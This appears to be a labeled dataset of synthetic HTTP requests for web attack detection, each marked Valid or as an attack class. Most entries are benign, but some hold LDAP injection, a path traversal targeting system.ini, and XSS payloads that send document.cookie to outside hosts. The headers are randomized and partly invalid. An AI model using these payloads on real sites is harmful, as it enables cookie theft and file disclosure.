Cookie2: $Version="6"
Date: Tue, 03 Nov 09 20:02:19 CET
ETag: ".nm9GHqe5y1ddcKnHj"
Expect: 100-continue
From: nikAlis@eeus.com
If-Modified-Since: Sat, 09 Aug 08 09:04:31 CET
If-Unmodified-Since: Thu, 20 Apr 06 24:55:32 GMT
If-Match: *
If-None-Match: "jDhyK6CRJvea48i"
If-Range: "FotIECYv8jgAkK9AW.8r"
Max-Forwards: 544
MIME-Version: 5.9
Pragma: no-cache
Proxy-Authorization: NTLM Y3NyZHVIaWVFOWxseW8yYWUwRWhzZWJlb0VuYW5obmVn
Authorization: Basic UnNhYWh0OmFUbm0=
Range: 8-
Referer: /ot8eOal/bnfud.asmx
TE: trailers,trailers,trailers
Trailer: Referer
User-Agent: bpb1yoiusheteibormy
UA-CPU: StrongARM
UA-Disp: 2337,296,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 5189x1158
Via: 6.1 46.86.219.75:86
Transfer-Encoding: deflate
Upgrade: doots/6.6
Warning: 881 35.69.28.129 "mesddqopoikepkyer" 
X-Forwarded-For: 175.39.106.169
X-Serial-Number: 24189
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11549
Start - Id: 38549
class: LdapInjection
GET /dQ2/nT9ranNhiolr8Rzii/OP6N9nwYaccess_logn9zt/qF8betweenuP/wsg-0g/wb9M7fH/Cmeta-qDwPebTscriptKnVhtpass/osioe.html?manol=eeeo%29%28%26%28objectClass++++%3D++++swn*%29&ic1tlttOsy=nojl7adNnph-tq HTTP/1.1
Host: www.gaDe.gov
Connection: keep-alive
Accept: image/jpeg
Accept-Charset: iso-8859-15;q=0.4, x-mac-greek;q=0.8, euc-cn, x-mac-japanese
Accept-Encoding: deflate;q=0.7, gzip;q=0.6, compress;q=0.1, gzip;q=0.1, compress
Accept-Language: lteAtt-eeOzttt;q=0.3, Ie9edp-09tnettt;q=0.8
Cache-Control: min-fresh=43450
Client-ip: 137.169.169.214
Cookie: LiRmckNfromz=59723972;seeoiaod8eio=60;nMat=21
Cookie2: $Version="697"
Date: Sat, 07 Apr 07 15:08:16 CET
ETag: W/"Mx20H@ckCBRko3Mhzz"
Expect: 100-continue
From: zttnih@4elXnnltkb.org
If-Modified-Since: Mon, 29 Jun 09 13:04:30 GMT
If-Unmodified-Since: Mon, 12 Apr 04 18:58:46 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 10 Feb 06 03:23:18 CET
Max-Forwards: 0987
MIME-Version: 2.4
Pragma: no-cache
Proxy-Authorization: NTLM Z2RpZWZmYTBGUG1yQWRpSUhuUnQ5SjNpbzNzSWxuZXJVYXRzdGlvZW1veGxJbGlh
Authorization: Digest nonce
Range: -7890,43054-
Referer: http://www.oemw.it/nEures/soezye.tar.gz
TE: gzip
Trailer: If-Range
User-Agent: Mozilla/4.5 (Machintosh; U; PPC Mac OS X 6.9; he-8e; rv:5.2.9) Gecko/73977093
UA-CPU: 68000
UA-Disp: 967,395,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 8726x4401
Via: FTP/7.8 www.tthua.shtml, FTP/6.1 www.reaEhec.jpeg
Transfer-Encoding: deflate
Upgrade: ghm/2.7, nshsr/6.5, e5b/0.7, Iosom/6.6
Warning: 257 www.nege.css "tabeoWaOoehrErrknae" "Fri, 05 Jun 09 24:03:11 UTC"
X-Forwarded-For: 157.225.217.71
X-Serial-Number: 30599
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38549
Start - Id: 15494
class: Valid
GET /cKYObVLe0205K_Cb1Ys/aietlhrw/oPjmLO1-8oyjO/q5QIYStfp/Seoi4eoecif3kewh/a5_LjeePUyyR_JtOl/HdW5e/8aywhtosLuge.htm?wc=a+ HTTP/1.0
Host: www.3aeaenan.st
Connection: keep-alive
Accept: application/*, image/*;q=0.8, video/quicktime
Accept-Charset: euc-jp;q=0.8, windows-1251;q=0.5, ks_c_5601-1987;q=0.3, iso-8859-1;q=0.9, iso-8859-5
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: min-fresh=5976
Client-ip: 75.233.190.63
Cookie: ieo8ridvap5=&s;sd9h4ehroEndde=lsfi;eoosseeApldtd=a1sZ0=)ntohomet;enraS=caaxe;lak_I.=ol&
Cookie2: $Version="7"
Date: Thu, 16 Jul 09 04:58:25 GMT
ETag: "_3v6VtLlDAdHJIDC4Jn"
Expect: 100-continue
From: ense@reotnih1w.cz
If-Modified-Since: Mon, 22 Mar 04 20:50:02 CET
If-Unmodified-Since: Thu, 20 Aug 09 07:44:47 UTC
If-Match: "Qv1tzrkPk_56yEzFkL"
If-None-Match: *
If-Range: Fri, 20 Mar 09 12:08:50 CET
Max-Forwards: 29
MIME-Version: 0.6
Pragma: 9gIrd='TlE'
Proxy-Authorization: NTLM bWxyd2FvRUYwYWlwbzNvYWRlcmZUb2VzM2h1dE5MbDdndGRuZWE1cng4aWFvZQ==
Authorization: Basic bXUzdGd0OnNiZWRvZg==
Range: -613967
Referer: /EYwn6o4/ra7ak/Eabweso.js
TE: gzip
Trailer: Max-Forwards
User-Agent: vuu9 (oCd383I0; r54vSowfP; o30IIVicy; oRmRMD; etXJsYZa)
UA-CPU: Sparc
UA-Disp: 0411,934,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 1725x7516
Via: 9.2 www.Lials.css
Transfer-Encoding: compress
Upgrade: cwynn/5.0, lsm/0.3
Warning: 718 www.80zvotre.png "la57regea" 
X-Forwarded-For: 143.27.31.69
X-Serial-Number: 21306565685732
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15494
Start - Id: 6005
class: Valid
PUT /1n99gIBg_/2scachdimae/.-BpG7HlsR.tiff? HTTP/1.0
Content-Length: 169
Content-Language: tas
Content-Encoding: identity
Content-Location: /oryl/tocn2Muk/tnearf/wdke.wmn
Content-MD5: ZWFic2NuY2NOdmNlY3Vpcg==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 22 Jan 09 22:23:26 CET
Last-Modified: Sat, 24 Jan 09 16:10:48 UTC
Host: 60.112.233.192
Connection: 2gjaedte
Accept: */*;q=0.6
Accept-Charset: iso-8859-7;q=0.5, hz-gb-2312;q=0.5, x-mac-hebrew;q=0.1, iso-8859-2
Accept-Encoding: identity, identity
Accept-Language: *;q=0.5
Cache-Control: max-stale=353
Client-ip: 252.119.203.23
Cookie: tioanpit=eksam
Cookie2: $Version="7"
Date: Fri, 25 Mar 05 23:50:02 UTC
ETag: W/".CX1myNpTOWnQmhPJl"
Expect: trosia
From: aH2oeaxm@3EiRSay.org
If-Modified-Since: Thu, 18 May 06 12:29:35 GMT
If-Unmodified-Since: Wed, 27 Sep 06 12:31:10 GMT
If-Match: "5dKDUWmfjbQqAts5v"
If-None-Match: "HvW.I.FMM6vif35CiW"
If-Range: Fri, 09 Oct 09 06:02:48 UTC
Max-Forwards: 22
MIME-Version: 4.3
Pragma: no-cache
Proxy-Authorization: NTLM d0llYXRub2l6c2VrZGMzZWxhdGVleW9lczZwN2ZuenJ0aHNoZXI=
Authorization: Digest uri=http://aake.de/iapT/twkpcg/gaotitr/oT51.mspx
Range: -57,295976-,-66
Referer: /ieesxtIs/6lo9cSa/ghlEEe/0sc7.mpg
TE: trailers
Trailer: Date
User-Agent: crenipe/8.0.7.9
UA-CPU: PowerPC
UA-Disp: 0303,1172,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 3062x279
Via: FTP/4.3 232.35.67.240, FTP/8.0 www.acbr.jpg
Transfer-Encoding: identity
Upgrade: sSsh0/2.9, sad61a/4.3, eEno/3.4, 1jEe/1.8, Sde/6.5
Warning: 330 www.Oteemon.tiff:442 "eenlria" 
X-Forwarded-For: 26.237.65.198
X-Serial-Number: 1285901452667782524
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mh=740602195&ylstat=ekoyeIrkaoemtew&adEiO5emE=h ~-&dJEvchildbOAFw7C=t0'] o8&csfmznt=fz2w&a1G5jbf8eKp=991343&16nph--linkC-TCmC=34&iHroMwwr=8967356988&3dtKnrNsytOy=5

End - Id: 6005
Start - Id: 22024
class: Valid
GET /riEkS6S/tB2LfHxvg/dcdtmebwdgeascs/txfahezn8ae4nb3hej/isceeixkiG/lekhisEhlasdeada/riolaea/ndernaizImAwvae/gboetmrctmyf8n9dnEE/1rasydXaies/dht8ekmm/s27wQ@icp9geRv1z0kM.html? HTTP/1.0
Host: www.iaoe.st
Connection: acAar9de
Accept: */*
Accept-Charset: *
Accept-Encoding: identity, identity, identity, gzip;q=0.8
Accept-Language: afch-iss, qyo-rqt
Cache-Control: no-transform
Client-ip: 84.126.149.107
Cookie: upFM=742;onebh6btaaaeih=3059394609;tss=sj4OA;GkRhrGtelnetd_= 
Cookie2: $Version="498"
Date: Wed, 01 Sep 04 05:37:23 UTC
ETag: "IR9gJRDUeErmjjmYy"
Expect: iellsni=Marlereo
From: rnoHSnss@agsartc.de
If-Modified-Since: Mon, 22 Dec 08 14:24:56 GMT
If-Unmodified-Since: Sun, 01 Mar 09 20:40:25 UTC
If-Match: *
If-None-Match: "EnVfKxpJzjiQfOymq8"
If-Range: Sun, 02 Oct 05 04:58:38 GMT
Max-Forwards: 701
MIME-Version: 1.6
Pragma: s1peRwee='nya'
Proxy-Authorization: NTLM Um9zRndCZXRPaXl1MEU0c3RFY2xlcmRlM3JlZmdybnI=
Authorization: 6sB8at rohxrm=Hjabh
Range: -83545,-8754,2573-
Referer: http://e2efis3b.net/Ac2rbtM/eBngure1/n4ayste.jpg
TE: gzip,trailers,deflate
Trailer: Trailer
User-Agent: Mozilla/5.7 (X11; U; Linux i386 9.6; Hn-tr; rv:2.4.4) Gecko/77357863
UA-CPU: StrongARM
UA-Disp: 207,573,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 915x5252
Via: 9.5 156.200.6.77, HTTP/1.9 www.radi.htm
Transfer-Encoding: identity
Upgrade: p9tI/9.2, 8r9o/6.5, aeyn/9.3
Warning: 348 177.112.64.151 "nsheeei3eai" "Thu, 05 Jan 06 03:57:01 GMT"
X-Forwarded-For: 167.167.68.206
X-Serial-Number: 10148622161169
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22024
Start - Id: 21592
class: Valid
GET /nlER.wxcKVqYM_NTsXL/nrhehlAd4i2uTbt/tytldA1iqatEqb4teem/9GQmIBdTk/e38mNy/5lsmbtowssowerf/emk/sO6a2jEKf9WVWncsr.js?oenyri2d1=i%2Fetce%5Dndi+l0aloptes+e%24&8kysn4ho=089&NrLhtpassdVaTLH=37916716&cecrOllzssn=d6andltn%2F+o&bsias1drmz=40068&stht8haonateyl2=like8 HTTP/1.0
Host: 213.138.225.88
Connection: close
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: identity;q=0.7
Accept-Language: *
Cache-Control: lahcs='n'
Client-ip: 152.191.209.222
Cookie: nbt=l<3hbtf7:etghrc;d3hhnginnsPFpg=adJQNit0xWc;rEsr7d=27;eco2sssr9a7wty=[8e;l5cdimlo=SesieT
Cookie2: $Version="812"
Date: Sat, 21 Mar 09 19:20:52 CET
ETag: "HbDOE4mELUlA4X1_S"
Expect: EfeOt
From: toezo@tGec.fr
If-Modified-Since: Wed, 14 Nov 07 06:44:01 CET
If-Unmodified-Since: Sat, 01 Mar 08 15:21:13 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 33
MIME-Version: 2.8
Pragma: ae='deriaY'
Proxy-Authorization: Digest nc=69Fc9563
Authorization: ykiee rotu=n2onenx
Range: 2-,639-89,039-12407
Referer: http://itiu.st/uPhld/aila/Qz0koz.mpg
TE: trailers
Trailer: Cache-Control
User-Agent: Mozilla/6.5 (Machintosh; U; PPC 1.6; lw-6r; rv:2.2.6) Gecko/96828938
UA-CPU: x86
UA-Disp: 198,1596,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 1645x752
Via: htnho/9.2 www.9eys.tiff:4, HTTP/3.7 100.23.86.16:98479
Transfer-Encoding: ttNht; hXyEppw=drn9
Upgrade: aead5/2.4
Warning: 454 253.133.69.76 "ooerIseMeAi7r9coias" "Sat, 14 Oct 06 08:48:24 UTC"
X-Forwarded-For: 99.21.116.3
X-Serial-Number: 0418048557333038
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21592
Start - Id: 10218
class: Valid
GET /po8o81i2c/g62CCQQi/6Fhc/hxRa4IftqiZx8MNB/2A0dGWHGRlYI9X@H.jpg? HTTP/1.1
Host: 48.252.156.113
Connection: efot
Accept: */*;q=0.2
Accept-Charset: koi8, ks_c_5601-1987, windows-1250;q=0.0, windows-874;q=0.9
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=4
Client-ip: 90.210.213.62
Cookie: Mii=73;8fDaraett5go=tOt;hqhDrsdmhgcrc=aBSbTCmR-ScR
Cookie2: $Version="0"
Date: Sun, 22 Oct 06 18:48:11 GMT
ETag: "IP5xSEB5i48TBsbyt"
Expect: 4Pimw
From: wtrHit2e@1hInbeFrp.de
If-Modified-Since: Thu, 17 Jan 08 09:48:43 CET
If-Unmodified-Since: Fri, 10 Mar 06 24:10:36 UTC
If-Match: "UrdhneqJv63WoNj6"
If-None-Match: "_bsKl7H4E7E@t-uKSH"
If-Range: *
Max-Forwards: 899
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: NTLM bG9leGlSbnBrdWVuMVhoZXJtMGR4blNlbHRlbHdsYXRpMHNocmlvZDlwZG52em8=
Authorization: hR2kr 44ooj=fGiihvsr
Range: 399-,-5952
Referer: /dwset8h.mspx
TE: trailers,trailers,trailers
Trailer: Transfer-Encoding
User-Agent: mDoKIkP http://www.cu1N.gov
UA-CPU: MIPS
UA-Disp: 6635,0350,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 099x017
Via: 9.3 91.13.216.48:5, 3.1 234.140.17.96, FTP/8.0 232.80.94.192
Transfer-Encoding: a7fa
Upgrade: astbe/1.5
Warning: 637 www.hs6E.png "t1aojshwaSSaeBsobih" "Fri, 24 Jun 05 14:32:42 CET"
X-Forwarded-For: 119.252.21.3
X-Serial-Number: 9799950017867099
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10218
Start - Id: 45841
class: PathTransversal
GET /vt/4HbTk/sS32AgtDq/ta2iaIespsl/c26dNUtT4VmU-_/BEDylsA4Z3Et2s0/nGggrJ8@rtRH/ugz6ht6ttetdrnr/uYVVD0YSfD@PF/nttw.js?el4sjweoc9=bderoa70Erlofkan&ffRnbCthHoahhl=i%40qSV3y-&og=%3ENoaf&hsbnd5iiur=fhs&saaEuy0Q=%5CWINDOWS%5Csystem.ini&5odocumentDlZtJ1dl=10911939&ee8lokeEeh=i5i&bwnReeaa=593322 HTTP/1.1
Host: www.ys2edehj.fr
Connection: riiOqr
Accept: */*
Accept-Charset: cp-950;q=0.3, windows-1257;q=0.4, iso-8859-9;q=0.2, iso-2022-kr
Accept-Encoding: *;q=0.3
Accept-Language: *;q=0.3
Cache-Control: no-transform
Client-ip: 145.76.47.201
Cookie: Vgtmptpwety=enyiEAx2fe;meseLbhlrF1g=02106;aPax= ezea'lEc&a$e
Cookie2: $Version="84"
Date: Wed, 07 Nov 07 02:03:45 CET
ETag: "w2vPLptRFBMbnkB@"
Expect: crmd2me
From: ix4abcph@mnt9ssu.gov
If-Modified-Since: Sun, 06 Aug 06 08:42:43 UTC
If-Unmodified-Since: Thu, 15 Sep 05 05:10:13 UTC
If-Match: *
If-None-Match: "zXW-D.D90nzMt8qQ"
If-Range: *
Max-Forwards: 4
MIME-Version: 9.7
Pragma: no-cache
Proxy-Authorization: Digest uri=http://www.ncrl8sh.ch/2nled.asp
Authorization: NTLM TmVsbzhpNWJ5b0hpaGRyaFJlZXRpZW1zbklsZDlUY00=
Range: -901,-390,-62087
Referer: http://www.aei9j.org/esSagis/etC5ne/DnfEaith/efSkHs.pdf
TE: gzip;q=0.3
Trailer: Transfer-Encoding
User-Agent: Mozilla/8.8 (X11; U; Solaris 2.8; er-vq; rv:6.0.7) Gecko/51877927
UA-CPU: Sparc
UA-Disp: 7854,570,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 861x425
Via: 9.8 245.231.3.126, 7.5 www.asb3t.jpg:55428
Transfer-Encoding: compress
Upgrade: inw5/1.5, wwesr/8.9, 5rte/1.6, d8hhli/8.3
Warning: 146 143.244.193.232 "tjezxosaoyuieeityv" 
X-Serial-Number: 25397478987579
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45841
Start - Id: 46606
class: XSS
GET /eheusns/4OmnfsngadueEju3dR/70dxO-J1O8maF/exiviHqC_B7Inh/r1x/mxnG0n7/sroaUi5asoi/50lhZyWtZKP/gZqT/eX2DGBVqL@l4tQ.aspx?aorwe7=98232 HTTP/1.0
Host: 8.78.83.144
Connection: dnaed1E
Accept: image/*;q=0.6, text/*, audio/x-wav;q=0.1
Accept-Charset: *
Accept-Encoding: <img     src   =   "armaatsele   >    " onmouseover=  "[document.location.replace  ('http://www.ns.com/cgi-bin/gearalmans.cgi'+document.cookie);]    "   >
Accept-Language: *
Cache-Control: no-cache
Client-ip: 151.185.246.142
Cookie: rcmdOeselpqe6ib=ehttahnafc;hYt5rcpMm7exec=fQh;izte9=1714;5hneaaesrmz4iut=2ohuhlm0gswoimAe
Cookie2: $Version="6"
Date: Sat, 03 Jul 04 05:08:28 UTC
ETag: W/"i1SzQL9_A_G6IGY"
Expect: 100-continue
From: cmafia1u@4a9he51St.com
If-Modified-Since: Wed, 19 Nov 08 22:58:06 CET
If-Unmodified-Since: Fri, 06 Jan 06 04:55:35 GMT
If-Match: "teX1@Y8Tg6wL0tZ"
If-None-Match: *
If-Range: *
Max-Forwards: 3726
MIME-Version: 0.9
Pragma: a=Tsi
Proxy-Authorization: sifg csiik=w7hiha
Authorization: 9iru rinrtild=ef2cniut
Range: 29-,197659-,4-7273
Referer: http://s45Kep.st/ymdi36y/vuura9p/eaekme/fbhrs8/manid.tiff
TE: deflate;q=0.6
User-Agent: Mozilla/4.3 (Machintosh; U; PPC 1.1; Eh-i4; rv:9.1.6) Gecko/61114810
UA-CPU: x86
UA-OS: Windows 98
UA-Color: color32
Via: 8.5 64.150.85.215
Transfer-Encoding: deflate
Upgrade: 1ssnt/2.7, Necil/0.4
X-Serial-Number: 1492216071266742097
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46606
Start - Id: 28387
class: Valid
GET /mByE/C4/ahpbo57rgLi7nm7e/nBDPHtSUgOf/jYvA7doYf.shtml?8t1krF8nyeexC=cy65k3z&ugnatn=aHMlPXd&ainN3iowl9lag=22 HTTP/1.0
Host: www.dgeIyori3h.org:80
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: gzip;q=0.6, compress
Accept-Language: heai4age-ebaCTi, ireyAoos-ReseAor;q=0.2
Cache-Control: max-stale
Client-ip: 43.89.221.156
Cookie: tem=978;isO=7-BW;adttess=rXQhBfEGyU;kce2tnT=slogsform;aeteeerssEe5=hiumocmtsc
Cookie2: $Version="142"
Date: Mon, 19 Apr 10 24:38:00 CET
ETag: W/"4XuG9KgXg@dZ5NSgr"
Expect: 100-continue
From: tduar@4rlra.gov
If-Modified-Since: Sun, 03 Jun 07 08:12:04 GMT
If-Unmodified-Since: Thu, 30 Mar 06 07:52:56 CET
If-Match: "K.QYIoFxjPb-S-D"
If-None-Match: "i_n1dzhyKWOLizG"
If-Range: *
Max-Forwards: 0
MIME-Version: 5.5
Pragma: pEooigie='c'
Proxy-Authorization: Basic b3NtdDA6YW5mMmFvYXQ=
Authorization: ejouB wzccOa=edsedbd
Range: 754-536
Referer: /kaiho/lrf1t/lbsn/1swde.tar.gz
TE: chunked;q=0.6,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/4.2 (Machintosh; U; PPC 1.4; oe-tr; rv:8.4.4) Gecko/82217683
UA-CPU: StrongARM
UA-Disp: 243,084,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 965x809
Via: nsi/1.8 www.9om4e.js, FTP/5.9 19.146.105.217, FTP/1.6 www.hdqteve6.htm
Transfer-Encoding: compress
Upgrade: eLhe/7.7, kbn0w/2.9
Warning: 345 www.hgai5ot.htm:2875 "nludwdni9ltuy" "Mon, 02 Jan 06 07:48:35 CET"
X-Forwarded-For: 112.8.23.251
X-Serial-Number: 7465297368
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28387
Start - Id: 21299
class: Valid
GET /0rDo0bQlKEjdKYhvUv5/z3aeeh/rAeJ3/eLH/19-/isRomtlbn.nsf?ohp=lreShy&vLkpu_@=3914&ha8mee=47&Metxt=3&puxGkyIlrX=4e%2Fe&1JuQEpshutdownT=41378&ceojeu1op=s3LTrh&atouirs3n=lroa7s%7ClUc%2Bnc%29hacROwe&0vHkO=h+wik%5B%25e+hew9e+Goa&yasesepe=7596854266&wclogfromyr6R0=528304&lxcxgts=eueooaa6oc&be51hv6=style6%3EanddeaOmjn+K7&Trane=qxd9hpbt0acn HTTP/1.0
Host: www.tnrr.de
Connection: close
Accept: application/*, video/mpeg;q=0.0
Accept-Charset: *;q=0.8
Accept-Encoding: *
Accept-Language: ho-amdaebpm;q=0.8
Cache-Control: mnbr0rju='oa'
Client-ip: 244.23.171.252
Cookie: onuSgnyrlbs=b5usr>opt2dostdinvira %eAz
Cookie2: $Version="565"
Date: Thu, 06 Jul 06 07:34:08 UTC
ETag: "TGlCpO2QRbtWoKg"
Expect: 100-continue
From: nsgt@tyrb.fr
If-Modified-Since: Wed, 18 Oct 06 20:26:18 GMT
If-Unmodified-Since: Sun, 08 Aug 04 12:48:17 UTC
If-Match: "mVb2xtgQ-h_pIWZEsdi"
If-None-Match: *
If-Range: "aRbpN2Psq2xp2pu1Pbs"
Max-Forwards: 4
MIME-Version: 3.2
Pragma: zno='ghxt'
Proxy-Authorization: NTLM T2VhbmFpbm05Y2hydW43d3BBZUpsZWNvYnIxN3JyTWZubmh5U2FlN0V0ZW94d3Q=
Authorization: dnmtt aieee4A=oegr
Range: 863-
Referer: http://www.c3bl.net/7riDee77.wmn
TE: deflate;q=0.4
Trailer: Trailer
User-Agent: Mozilla/7.6 (Machintosh; U; PPC Mac OS X 0.9; we-7m; rv:0.2.6) Gecko/70489202
UA-CPU: PowerPC
UA-Disp: 698,349,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 714x7693
Via: 3.3 37.64.192.90
Transfer-Encoding: ac4lh
Upgrade: oSii/2.9, rhi/9.2, rNil/2.3, sIri5t/1.2, seoE7t/2.4
Warning: 749 www.en5tssls.jpg "nqn0" "Mon, 30 Aug 04 15:46:19 UTC"
X-Forwarded-For: 56.53.73.85
X-Serial-Number: 900444
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21299
Start - Id: 30443
class: Valid
GET /djzTud4GK@Lw5Xa/kSueqZdsQmF6-bW/1cNehetetn/1wh_ZxY0IYcyh6sn/YU/ol8jdltwroy/euTywFJ4xQykB@g4/1m8tSdrOea9csiaagdt/tuyE3lcrg-/dImD2ANAfjcpassthru.jpeg?tdgordthtaA9hHq=alg1u2wservices&a8hlklITi=95&ns7eoiio=Y4e+rbgsound&Q_Q8Korv@connectx=%296db+dnI%40+n&gmtd3bistoen=eDJORro5G-&WMU@6my=httpsnniant HTTP/1.0
Host: 157.130.254.254:80
Connection: close
Accept: image/*;q=0.3, text/html, image/*;q=0.6
Accept-Charset: utf-8, iso-8859-6;q=0.6, koi8;q=0.8
Accept-Encoding: *;q=0.7
Accept-Language: *
Cache-Control: max-age=0
Client-ip: 69.55.224.99
Cookie: oanrkyk=eP6AFLFp7V8-;zsrion2=1;ipeahdra=rdM-YUAD0K;7mliIsHTsetMn=ttMihyanhtpassa?ey;QxeQe8=1381;lttn=3a8pretexudex
Cookie2: $Version="2"
Date: Wed, 25 Feb 09 01:20:06 CET
ETag: W/"u6_wVOxzSgsClSLzUwgF"
Expect: 100-continue
From: owe86ct@wnsee.de
If-Modified-Since: Mon, 26 Dec 05 03:42:30 UTC
If-Unmodified-Since: Fri, 10 Oct 08 11:44:07 GMT
If-Match: "68D_DUhRTVu_9KQ"
If-None-Match: *
If-Range: "KKhE.T63yuAnCy4F6ezR"
Max-Forwards: 23
MIME-Version: 7.4
Pragma: nwkb7l=efnspov
Proxy-Authorization: 0atelo euOnc=Kdh2
Authorization: NTLM bmViczF6ZU5ucm55YnRheGJvdW9wb200bGl1dWQ5dHRhc3hndW51SGVhaA==
Range: -8,-760245
Referer: http://www.ptrc6tor.st/5csk/necc/odomin/edti7lp.gif
TE: gzip;q=0.0,chunked
Trailer: TE
User-Agent: 1ooset9ntnvteo4
UA-CPU: PowerPC
UA-Disp: 2452,8346,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 094x400
Via: iwr/6.7 www.amtah.gif:0567, 8.1 www.etgavUt.js, 3.6 www.tzei.js
Transfer-Encoding: compress
Upgrade: dksM/4.0, egtr/5.6, at1f/2.7, Ruilnr/5.9, epf4h3/8.8
Warning: 468 www.emIt4fe.html "irdiBnlnZap" "Mon, 07 Feb 05 01:41:05 UTC"
X-Forwarded-For: 97.116.231.157
X-Serial-Number: 839589841918771
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30443
Start - Id: 47004
class: XSS
GET /4A0sgE1Qf/rIinsertdfx.dll?teapanior=ann%27ics2Yandalo&7owtyec5=8607128&onn0bgio7fe=1dstmwde&inr=pm9oiaeeamA&VaLDrLiframe.=e&tobvtsb9s=ologdccry+b%2Bq&locationfaxBc=%3Cinput+++++type+++%3D%22++++image++%22+++++dynsrc%3D+%22+javascript%3A++%5Bwindow.open%28%27http%3A%2F%2F154.246.115.121%2Fermare.exe%27%2Bdocument.cookie%29%3B%5D++++%22+++%3E&o6ed=%5Ba%7Clo&ut=rert%27N&eC=sdv&uxW2=275 HTTP/1.0
Host: www.mtNmSr7c.be:80
Connection: keep-alive
Accept: video/*
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: oldtn-8kiia;q=0.8, 0nkG-arsto, 0sctu3s-nlscdshr;q=0.5, qtvcxne-m;q=0.3
Cache-Control: only-if-cached
Client-ip: 56.72.28.92
Cookie: ugnpd=21;0log..k2=oeaua;smdaI=o<aiille%insert
Cookie2: $Version="07"
Date: Sat, 21 Jul 07 05:24:29 UTC
ETag: "o8HdQMwRnEl_XlX"
Expect: 100-continue
From: vsl8rn@orhoE.de
If-Modified-Since: Sat, 08 Aug 09 10:50:52 GMT
If-Unmodified-Since: Sun, 16 Apr 06 16:27:56 CET
If-Match: *
If-None-Match: "81tETmx3dg0EJmVebvH"
If-Range: Thu, 15 Mar 07 12:07:43 UTC
Max-Forwards: 945
MIME-Version: 0.5
Pragma: no-cache
Proxy-Authorization: Basic YXN3clRGOmVyY2w=
Authorization: Digest uri=http://www.hnk7xso4.fr/ttaimr/Neratne0.css
Range: 5-22964
Referer: /ahs5i/t2ajkn/te5r/icqnDgq/s2ui.tar.gz
TE: trailers
Trailer: Upgrade
User-Agent: rXNjTR http://www.ln3Pm1hr.biz
UA-Disp: 175,1584,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 347x3393
Via: 5.3 128.194.204.112, FTP/2.4 254.40.235.15:29, 1.1 205.201.60.208
Transfer-Encoding: identity
Upgrade: l9oe/6.6, lEdpas/0.5, d78nsb/8.9
Warning: 544 www.ccrt.gif "oteAehiueo" "Fri, 15 Apr 05 23:43:34 GMT"
X-Forwarded-For: 212.120.206.157
X-Serial-Number: 09560109
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47004
Start - Id: 22840
class: Valid
GET /efWyejkbfntispe/Mahaoe4uuiEeeaOv/-boot.ini-0@/eEwbzb-i7xY/a9JWd5NytOY.Ni5/aWOlj7GFpb0wWr1n1/slYQcF.php4?womemf=hnhr%3Drhhcteaiyng3o&3ya5m=30121491&end=r41a&ashEa=85406849&ms1iuaneleand9=mHdiC&afewkneshr=aKm+iosrEe&reit=iHmifceu&8tjjoelShe0wos=43&wTaoOcSaer=2&Tb=to%3D&tl2t1a=+a&ss7Toi3hj2awd=Ne&eesew=63199202&unRsepd9=chieelml5elbnwge HTTP/1.0
Host: 190.89.108.89
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: cp-936;q=0.2, x-mac-cyrillic;q=0.6
Accept-Encoding: 
Accept-Language: lsutsrdr-9btwmdp;q=0.6, w-iyv;q=0.1
Cache-Control: min-fresh=7102
Client-ip: 39.158.127.75
Cookie: SS=e2 l8sni;nlntrapalse=hfrierfarren;7tdtdstui=rels A0a;no1lntexsnhcttl= 8n;Uktlmysfes=cex 
Cookie2: $Version="045"
Date: Sat, 20 Nov 04 07:50:51 GMT
ETag: "a_aMJOhUcEIiw0nque"
Expect: fltD89
From: trsehe0n@ajce.be
If-Modified-Since: Thu, 08 Jun 06 04:58:25 UTC
If-Unmodified-Since: Sun, 23 May 04 03:48:30 GMT
If-Match: "b4FjTY.0es@5j7UzLq"
